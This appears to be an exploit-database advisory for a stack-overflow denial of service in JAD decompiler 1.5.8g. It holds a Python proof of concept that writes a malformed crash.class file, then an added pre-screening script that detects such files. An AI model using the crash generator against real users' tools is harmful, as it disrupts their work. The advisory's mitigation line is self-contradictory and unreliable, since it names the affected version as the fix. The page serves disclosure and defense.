Vendor: JAD java decompiler
By: l3D
CVSS: 7.5 HIGH
Stack Overflow
CWE: 121
Product Name: JAD java decompiler
Affected Version From: 1.5.8g
Affected Version To: 1.5.8g
Patch Exists: YES
Related CWE: N/A
CPE: a:varaneckas:jad
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

JAD java decompiler 1.5.8g (.class) Stack Overflow DoS

JAD java decompiler 1.5.8g contains a stack overflow vulnerability that is triggered when a specially crafted .class file is opened. This can be exploited to cause a denial of service condition when the application is opened.

Mitigation:

Upgrade to the latest version of JAD java decompiler 1.5.8g or later.

Exploit-DB raw data:

#!/usr/bin/env python
#JAD java decompiler 1.5.8g (.class) Stack Overflow DoS
#Tested on Windows
#Software Link: http://www.varaneckas.com/jad
#Author: l3D
#Site: http://xraysecurity.blogspot.com
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com

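# Class-file header: magic 0xCAFEBABE, minor_version 0x0104,
# major_version 0x0104, constant_pool_count 0xFFFF.
header = b'\xca\xfe\xba\xbe\x01\x04\x01\x04\xff\xff'
# 0x100000 repetitions of tag 7 (CONSTANT_Class) with name_index 0x0101.
evil = b'\x07\x01\x01' * 0x100000
# Bytes literals and binary mode so the bytes are written unchanged.
with open('crash.class', 'wb') as bad:
    bad.write(header + evil)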
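
A pre-screening check for untrusted .class files before they are handed to a decompiler, as an added example that is not part of the original advisory or the JAD project: it walks the constant pool per the JVM class-file format and reports CONSTANT_Class entries whose name_index does not refer to a CONSTANT_Utf8 entry, which is the malformation visible in the file above. The names screen_class_file, u2, GOOD and BAD and the sample bytes are constructed for illustration; the page does not state which structure triggers the overflow inside JAD.

```python
# Added example: structural pre-screen for untrusted .class files (Python 3).
# Payload size in bytes after the tag byte, per the JVM class-file format.
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
         12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
UTF8, CLASS = 1, 7

def u2(data, pos):
    """Big-endian unsigned 16-bit read; a short slice yields a smaller value."""
    return int.from_bytes(data[pos:pos + 2], 'big')

def screen_class_file(data):
    """Return a list of findings; an empty list means the pool is consistent."""
    if len(data) < 10 or data[:4] != b'\xca\xfe\xba\xbe':
        return ['not a class file (bad magic or truncated header)']
    count = u2(data, 8)
    tags, class_refs = {}, []          # index -> tag; (index, name_index)
    pos, idx = 10, 1
    while idx < count:                 # valid indexes are 1 .. count-1
        tag = data[pos] if pos < len(data) else None
        if tag == UTF8:
            size = 2 + u2(data, pos + 1)
        elif tag in FIXED:
            size = FIXED[tag]
        elif tag is None:
            return ['constant pool truncated at entry %d' % idx]
        else:
            return ['unknown constant tag %d at entry %d' % (tag, idx)]
        if pos + 1 + size > len(data):
            return ['constant pool truncated at entry %d' % idx]
        if tag == CLASS:
            class_refs.append((idx, u2(data, pos + 1)))
        tags[idx] = tag
        pos += 1 + size
        idx += 2 if tag in (5, 6) else 1   # Long/Double occupy two slots
    bad = [i for i, name in class_refs if tags.get(name) != UTF8]
    if bad:
        return ['%d CONSTANT_Class entries do not name a Utf8 entry (first: #%d)'
                % (len(bad), bad[0])]
    return []

# Constructed sample: one Utf8 entry "A" and one Class entry naming it.
GOOD = (b'\xca\xfe\xba\xbe\x00\x00\x00\x34\x00\x03'
        b'\x01\x00\x01A' b'\x07\x00\x01')
# Constructed sample: two Class entries whose name_index points at a Class entry.
BAD = b'\xca\xfe\xba\xbe\x00\x00\x00\x34\x00\x03' + b'\x07\x00\x02' * 2

if __name__ == '__main__':
    for label, blob in (('GOOD', GOOD), ('BAD', BAD)):
        print(label, screen_class_file(blob) or 'ok')
```

A file that fails this check can be quarantined or rejected instead of being opened in the decompiler.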